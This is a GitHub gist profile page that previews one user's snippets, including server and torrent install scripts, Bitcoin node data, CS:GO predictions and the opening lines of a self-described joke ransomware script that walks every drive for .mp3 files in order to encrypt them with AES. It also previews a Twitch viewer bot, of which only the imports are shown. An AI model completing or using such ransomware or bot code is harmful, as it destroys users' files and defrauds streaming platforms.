Skip to content

Instantly share code, notes, and snippets.

View daggerhashimoto's full-sized avatar
🧦
Swaggin

lil reentrant daggerhashimoto

🧦
Swaggin
View GitHub Profile
#!/usr/bin/env bash
# =============================================================================
#
# ------------------------------------------------------------------
# Bash Script to Setup a Web Server
# Install Apache or nginx, PHP, and FastSitePHP with a Starter Site
# ------------------------------------------------------------------
#
# https://www.fastsitephp.com

Codebase: Erlang Genesis block: Mar-02-2018 11:01:29 +UTC Consensus Mechanism: Proof of Work Algorithm: SHA256 Maximum Supply: Unknown Current Supply: 53,134.776750 Explorer: veoscan.io

Summary

This file has been truncated, but you can view the full file.
{"latest_height": 418653, "timestamp": 1467291903, "nodes": {"213.239.218.20:8333": [70012, "/Satoshi:0.12.0/", 1466846746, 5, 418653, "ns1.ativel.com", "N\u00fcrnberg", "DE", 49.4478, 11.0683, "Europe/Berlin", "AS24940", null], "45.62.245.122:8223": [80001, "/BitcoinUnlimited:0.12.0(EB16; AD4)/", 1466136030, 21, 418653, "unlimited.miningcryp.to", "Kitchener", "CA", 43.4106, -80.5011, "America/Toronto", "AS55053", "2267921 ONTARIO LTD"], "47.90.10.59:8333": [70012, "/Satoshi:0.12.0/", 1467283721, 5, 418653, "47.90.10.59", "Ottawa", "CA", 45.3433, -75.8265, "America/Toronto", "AS45102", "Alibaba (China) Technology Co., Ltd."], "69.50.189.156:8333": [70002, "/Satoshi:0.11.0/", 1466941442, 1, 418653, "69.50.189.156.cable.tpia.cipherkey.com", "Vancouver", "CA", 49.2788, -123.1139, "America/Vancouver", "AS25668", "Cipherkey Exchange Corp."], "td7tgof3imei3fm6.onion:8333": [70012, "/Satoshi:0.12.1/", 1466533384, 5, 418653, null, null, null, 0.0, 0.0, null, null, null], "31.172.85.47:8333": [70012, "/Satoshi:0.12.1/
@daggerhashimoto
daggerhashimoto / skrill_ransom.py
Created June 19, 2016 18:39
Ransomware that replaces all your music with Skrillex (not complete)
import os, random, struct, hashlib, time, win32api
from Crypto.Cipher import AES
extensions = ['.mp3']
def wubwub(key):
for drive in win32api.GetLogicalDriveStrings().split('\000')[:-1]:
for root, dirs, files in os.walk(drive):
for file in files:
if file.endswith(tuple(extensions)):

dignitas vs Renegades (12/06/2016)

https://img.shields.io/badge/prediction-success-green.svg

HLTV link: Link,

CSGL game odds 1 hour prior to start: Odds

Prediction

Model Predicts "dignitas" win no matter the map.

Max: 62% dignitas

@daggerhashimoto
daggerhashimoto / predictions.md
Last active June 12, 2016 13:12
CSGO Oracle statistical model predictions (11/06/2016)

dignitas vs HellRaisers (11/06/2016)

https://img.shields.io/badge/prediction-success-green.svg

HLTV link: Link

CSGL game odds 1 hour prior to start: Odds

Prediction

Model Predicts "HellRaisers" win no matter the map.

Max: 64% HellRaisers on Cache

@daggerhashimoto
daggerhashimoto / bot.py
Last active December 12, 2022 13:56
Twitch viewer bot
import requests
import subprocess
import json
import sys
import threading
import time
from Queue import Queue
import urllib3
import urllib3.contrib.pyopenssl
@daggerhashimoto
daggerhashimoto / utorrent.sh
Last active May 14, 2016 14:04
uTorrent installation script on Ubuntu 14.04 and lower
#bin/bash
# uTorrent installation script on Ubuntu 14.04
# 13.10.2015 - CD0x23
sudo apt-get install libssl0.9.8:i386
wget http://download.utorrent.com/linux/utorrent-server-3.0-25053.tar.gz
sudo cp utorrent-server-3.0-25053.tar.gz /opt/
cd /opt/
sudo tar -xvf utorrent-server-3.0-25053.tar.gz
sudo rm -rf utorrent-server-3.0-25053.tar.gz
import math
tickrate = 100
firerate = 0.1 # ak47 firerate (seconds)
seconds = 2 # nr of seconds to run spraying simulation
def inacc():
with open('CSinaccuracypre2.csv', 'w') as file: